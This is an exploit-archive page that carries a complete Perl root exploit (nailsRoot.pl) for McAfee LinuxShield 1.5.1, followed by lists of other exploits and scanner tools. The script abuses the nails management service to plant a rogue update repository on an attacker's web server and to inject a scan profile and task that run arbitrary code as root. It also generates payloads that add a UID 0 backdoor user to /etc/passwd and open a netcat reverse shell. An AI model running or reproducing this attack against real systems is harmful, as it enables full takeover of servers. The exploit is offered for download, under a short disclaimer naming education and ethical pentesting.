"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution"

Author

Exploit author

"Nikolas Sotiriu"

Platform

Exploit platform

linux

Release date

Exploit published date

2010-08-27

                
                    
                         Download file
                    
                
            
#!/usr/bin/perl

##
#  Title:     McAfee LinuxShield <= 1.5.1 Local/Remote Root Exploit
#  Name:      nailsRoot.pl
#  Author:    Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>
#  WARNING:   This Exploit deletes the default Update Server
#
#  Use it only for education or ethical pentesting! The author accepts 
#  no liability for damage caused by this tool.
#  
##

use strict;
use IO::Socket::SSL;
use Getopt::Std;

my %args;
my $ack;
my $timestamp;

getopt('h:p:u:v:e:a:g:', \%args);

my $gen_exec    = $args{g};

if (defined $gen_exec) {
	genEx($gen_exec);
}

my $target_host = $args{h} || usage();
my $target_port = $args{p} || 65443;
my $nails_user  = $args{u} || usage();
my $nails_pass  = $args{v} || "";
my $exec_path   = $args{e} || "/opt/McAfee/cma/scratch/update/catalog.z";
my $my_host     = $args{a} || "";

my $range = 50000000;
my $minimum = 90000000;

my $randomtask = int(rand($range)) + $minimum;

my $pre="sconf ODS_99 ";
my $post="\x0d\x0a";

my $setrepo1='db set 1 _table=repository status=1 siteList=<?xml\ version="1.0"\ encoding="UTF-8"?><ns:SiteLis'.
             'ts\ xmlns:ns="naSiteList"\ GlobalVersion="20030131003110"\ LocalVersion="20091209161903"\ Type="Clie'.
             'nt"><SiteList\ Default="1"\ Name="SomeGUID"><HttpSite\ Type="repository"\ Name="EvilRepo"\ Order="1"'.
             '\ Server="';

my $setrepo2=':80"\ Enabled="1"\ Local="1"><RelativePath>nai</RelativePath><UseAuth>0</UseAut'.
             'h><UserName></UserName><Password\ Encrypted="0"/></HttpSite></SiteList></ns:SiteLists> _cmd=update';

my $setsite="task setsitelist";

my $begin="begin";

my$set="set ";
my $profile=" nailsd.profile.ODS_99.allFiles=true nailsd.profile.ODS_99.childInitTmo=60".
       " nailsd.profile.ODS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=10000 nailsd.profile.ODS".
       "_5.datPath=/opt/NAI/LinuxShield/engine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.profile.".
       "ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib nailsd.prof".
       "ile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so".
       " nailsd.profile.ODS_99.factoryInitT".
       "mo=60 nailsd.profile.ODS_99.heuristicAnalysis=true nailsd.profile.ODS_99.macroAnalysis=true nailsd.p".
       "rofile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99.mime=true nailsd.profile.ODS_99.noJokes=false nails".
       "d.profile.ODS_99.program=true nailsd.profile.ODS_99.quarantineChildren=1 nailsd.profile.ODS_99.quaran".
       "tineDirectory=/quarantine nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.profile.ODS_99.scan".
       "Children=2 nailsd.profile.ODS_99.scanMaxTmo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profil".
       "e.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=true nailsd.profile.ODS_99.scannerPath=".
       "$exec_path".
       " nailsd.profile.ODS_99.scansPerChild=10000 nailsd.profile.ODS_99.sl".
       "owScanChildren=0 nailsd.profile.ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.filter.0.pat".
       "h=/proc nailsd.profile.ODS_99.filter.0.subdir=true nailsd.profile.ODS_99.filter.extensions.mode=all ".
       "nailsd.profile.ODS_99.filter.extensions.type=extension nailsd.profile.ODS_99.action.Default.primary=".
       "Clean nailsd.profile.ODS_99.action.Default.secondary=Quarantine nailsd.profile.ODS_99.action.App.pri".
       "mary=Clean nailsd.profile.ODS_99.action.App.secondary=Quarantine nailsd.profile.ODS_99.action.timeou".
       "t=Pass nailsd.profile.ODS_99.action.error=Block";

my $commit="commit ";

my $setdb=" _table=schedule taskName=$randomtask taskType=On-Demand taskInfo=profileName=ODS_99,".
        "paths=path:/root/tmp;exclude:false timetable=type=unscheduled taskResults=0 i_lastRun=1260318482 status=Stopped _cmd=insert";
	#update _where= i_taskId=2";

my $execupd="task nstart LinuxShield Update";
my $execute="task nstart $randomtask";

banner();

if ($exec_path eq "/opt/McAfee/cma/scratch/update/catalog.z") {
	if ($my_host eq "") {
		usage();
	}
	stOne();
}else{
	stTwo();
}

sub stOne {
	my $reposock = IO::Socket::SSL->new(
                        PeerAddr => $target_host,
                        PeerPort => $target_port,
                        Proto    => 'tcp',
        );

	if (defined $reposock) {
		print "[*] Executing Stage One\n";
		print "-----------------------\n";		

                $ack=<$reposock>;
                print $ack;

                print $reposock "auth ".$nails_user." ".$nails_pass.$post;
                $ack=<$reposock>;
                if ($ack=~m/ERR authentication failure/){
                        print "[-] Authentication failed...\n";
                        exit(1);
                }
                print $ack;
                sleep(1);

                print "[+] Repo update: inject evil repo\n";
                print $reposock $setrepo1.$my_host.$setrepo2.$post;
                sleep(1);

                print "[+] Repo Site update: update site task\n";
                print $reposock $setsite.$post;
                $ack=<$reposock>;
                print $ack;
                sleep(1);

                print "[+] Execute AV Update: downloading evil code\n";
                print $reposock $execupd.$post;
                sleep(5);  # Update needs a bit time
		$reposock->shutdown(1);
		
	}
	stTwo();
}

sub stTwo {
        my $sock = IO::Socket::SSL->new(
                        PeerAddr => $target_host,
                        PeerPort => $target_port,
                        Proto    => 'tcp',
        );

	if (defined $sock) {
                print "\n\n[*] Executing Stage TWO\n";
                print "-----------------------\n";

		$ack=<$sock>;
		print $ack;
		
		print $sock "auth ".$nails_user." ".$nails_pass.$post;
		$ack=<$sock>;
		if ($ack=~m/ERR authentication failure/){
			print "[-] Authentication failed...\n";
			exit(1);
		}
		print $ack;
		sleep(1);

		print $sock $pre.$begin.$post;
		$ack=<$sock>;
		print $ack;
			$ack=~s/\+OK //g;
			$timestamp=$ack;
			$timestamp=~ s/\s+$//;
			print "[+] Timestamp: $timestamp\n";
		print "[+] Profile: Injecting evil Profile\n";
		print $sock $pre.$set.$timestamp.$profile.$post;
		sleep(1);

		print "[+] Commit: Profile changes\n";
		print $sock $pre.$commit.$timestamp.$post;
		sleep(1);

		print "[+] Schedule: Injecting evil task $randomtask\n";
		print $sock "db set ".$timestamp.$setdb.$post;
		sleep(1);

		print "[+] Excute: Task $randomtask\n";
		print $sock $execute.$post;
		$sock->shutdown(1);
		print "[+] Done... Check whatever you did\n";
	} else {
  	        print "[-] some troubles with connection: $!\n" ;
	}
}

sub usage {

    print "\n";
    print " nailsRoot.pl - McAfee LinuxShield local/remote Root Exploit\n";
    print "===============================================================\n\n";
    print "  Usage:\n";
    print "           $0 -h <target ip> -u <user> -v <pass> [-a <my host>|-e <executable>]\n";
    print "  Optional:\n";
    print "           -a       <attacker host with httpd>\n";
    print "           -e       <executable file on target host>\n";
    print "           -p       <target port (default: 65443)>\n";
    print "           -g (1|2) <generat shell scripts to execute>\n";
    print "                    1 <UID 0 user add>\n";
    print "                    2 <reverse nc shell>\n";
    print "  Notes:\n";
    print "           -We can not handle arguments given to executable\n";
    print "            in the -e option.\n";
    print "           -To download your own evil executable, start a httpd\n";
    print "            and set the -a option. Create the directory <nai> in\n";
    print "            your wwwroot and rename your executable to <catalog.z>\n";
    print "  Author:\n";
    print "           Nikolas Sotiriu (lofi)\n";
    print "           url: www.sotiriu.de\n";
    print "           mail: lofi[at]sotiriu.de\n";
    print "\n";


    exit(1);
}

sub genEx {
    my ($code)=@_;
    
    if ($code==1) {
        print STDERR << "EOF";

============== UID 0 user add ==============

Copy this lines to the catalog.z file.

USER=haxxor PASS=haxxorPass

-------------- cut -------------- 
#!/bin/sh
echo haxxor:AzFQk89Xgpp8s:0:0::/:/bin/sh >> /etc/passwd
-------------- /cut -------------- 

EOF
    
    } elsif ($code==2) {
        print STDERR << "EOF";

============== reverse nc shell ==============

Copy this lines to the catalog.z file.

-------------- cut --------------
#!/bin/sh
nc -nv <yourip> 4444 -e /bin/sh
-------------- /cut --------------

EOF

    }

	exit(1);

}

sub banner {
	print STDERR << "EOF";
--------------------------------------------------------------------------------
         nailsRoot.pl - McAfee LinuxShield local/remote Root Exploit
--------------------------------------------------------------------------------
                                                                                
                                   111 1111111                                  
                            11100 101 00110111001111                            
                        11101 11 10 111 101 1001111111                          
                    1101  11 00 10 11  11 111 1111111101                        
                 10111 1 10 11 10  0 10  1 1 1  1111111011                      
              1111  1 1 10  0  01 01 01 1 1 111     1111011101                  
            1000   0 11 10 10  0 10 11 111 11111 11 1111 111100                 
          1111111111 01 10 10 11 01 0  11 11111111111 1 1111  11                
         10111110 0  01 00 11 1110 11 10 11111111111 11 11111  11   111         
        101111111 0 10  01 11 1 11 0 10 11 1111111111111111 1111110000111       
        011111 0110 10 10  0 11 1 11 01 01 111111111111111 1 11110011001        
       1011111 0110 10 11 1110 11 1 10 11111111111111111111  1 100  001         
       1011111 0 10 10 01 1  0 1 11 1 111111111111111111111111 001101           
        011111 0  0  0 11 0 1111 0 11 01111111111111111111111111  01            
       1111111 01 01 111  1 1111 1 11 1111111111111111111111 1101 1111          
      111 1111 10  0 111110 0111 0 1  0111111111111111111111 11111 1111         
     111 11111  1  11 1 1 1    111 11 11111111111111111111111110    1001        
    111 1011111   1 11111111110111111111111111111111111111111 01 10111001       
   11 1100    10110110    10001        11101111111111111111  10 111 11100       
  111  00      1011101      00101       0  11111111111111111001 11  111101      
  11  00        00 101      1000011     1011   1111   1111111000 1111111 0      
  11 00          0   1011      100001    101000 1 1001         00001111  01     
  01101          11111 1011               01100    0101          110  11 10     
  10111                   1                0  01    0000011         10    10    
   10011                                    11100       1111         101   11   
      1110 01                                 101011                   1001100  
         1111000011                            1  111                           
                11000001111                                                     
                           1                                                    

EOF
}

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-11-27	"libupnp 1.6.18 - Stack-based buffer overflow (DoS)"	dos	linux	"Patrik Lantz"
2020-11-24	"ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)"	webapps	linux	"Giuseppe Fuggiano"
2020-10-28	"aptdaemon < 1.1.1 - File Existence Disclosure"	local	linux	"Vaisha Bernard"
2020-10-28	"Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion"	webapps	linux	"Ivo Palazzolo"
2020-10-28	"PackageKit < 1.1.13 - File Existence Disclosure"	local	linux	"Vaisha Bernard"
2020-10-28	"Blueman < 2.1.4 - Local Privilege Escalation"	local	linux	"Vaisha Bernard"
2020-09-11	"Gnome Fonts Viewer 3.34.0 - Heap Corruption"	local	linux	"Cody Winkler"
2020-07-10	"Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution"	remote	linux	SpicyItalian
2020-07-06	"Grafana 7.0.1 - Denial of Service (PoC)"	dos	linux	mostwanted002

Release Date	Title	Type	Platform	Author
2013-01-18	"SonicWALL GMS/Viewpoint/Analyzer - Authentication Bypass"	webapps	multiple	"Nikolas Sotiriu"
2013-01-18	"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Command Execution"	webapps	multiple	"Nikolas Sotiriu"
2011-03-23	"Symantec LiveUpdate Administrator Management GUI - HTML Injection"	webapps	windows	"Nikolas Sotiriu"
2010-08-27	"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution"	webapps	linux	"Nikolas Sotiriu"
2010-08-19	"SonicWALL E-Class SSL-VPN - ActiveX Control Format String Overflow"	dos	windows	"Nikolas Sotiriu"
2010-03-04	"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities"	remote	windows	"Nikolas Sotiriu"
2009-11-02	"Symantec ConsoleUtilities - ActiveX Buffer Overflow (Metasploit)"	remote	windows	"Nikolas Sotiriu"
2009-10-20	"Websense Email Security - Cross-Site Scripting"	webapps	hardware	"Nikolas Sotiriu"
2009-10-20	"Websense Email Security - Denial of Service"	dos	hardware	"Nikolas Sotiriu"

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.